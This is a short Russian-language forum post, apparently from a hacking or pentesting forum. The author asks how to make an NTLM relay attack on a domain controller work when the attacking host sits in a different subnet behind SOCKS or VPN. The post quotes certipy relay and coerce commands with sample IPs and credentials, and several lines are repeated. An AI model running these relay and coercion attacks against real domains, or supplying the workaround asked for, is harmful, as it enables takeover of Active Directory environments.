давно мучаюсь этим вопросом, во всех мануалах которые встречал все конечно же работает идеально,
но там все хосты в одной подсети, что при socks/vpn подключении невозможно. в идеале нужно быть на одном интерфейсе с DC
мой пример, где
10.2.5.16 - DC
10.0.2.15 - атакующий хост
естественно он не работает хотя хост уязвим
это просто один из примеров, что под рукой было, на самом деле много разных способов перепробовал
если возможно такое реализовать через socks/vpn, где атакующий и атакованный хосты в разных подсетях подскажите инструменты/способы
но там все хосты в одной подсети, что при socks/vpn подключении невозможно. в идеале нужно быть на одном интерфейсе с DC
мой пример, где
10.2.5.16 - DC
10.0.2.15 - атакующий хост
Код:
certipy relay -target http://10.2.5.16
coerce -d testdomain.local -u test.user -p pass1234 -t 10.2.5.16 -l 10.0.2.15 --dc-ip 10.2.5.16
естественно он не работает хотя хост уязвим
это просто один из примеров, что под рукой было, на самом деле много разных способов перепробовал
если возможно такое реализовать через socks/vpn, где атакующий и атакованный хосты в разных подсетях подскажите инструменты/способы